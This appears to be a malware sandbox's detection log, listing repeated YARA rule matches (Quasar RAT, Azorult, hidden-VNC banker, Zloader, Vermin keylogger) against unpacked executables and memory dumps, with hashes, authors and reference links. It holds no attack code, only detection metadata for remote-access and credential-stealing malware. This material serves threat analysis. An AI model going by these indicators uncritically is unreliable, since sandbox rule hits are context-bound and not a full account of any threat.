Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 5.0.svchost.exe.c9ac50.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.c9ac50.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000013.00000000.745828436.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000017.00000000.783293959.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 00000012.00000000.724863626.00000000003F2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000013.00000002.754022001.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000001.00000003.684577030.000000000176B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000003.790922233.00000000014D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 0000000D.00000000.706677041.0000000000882000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
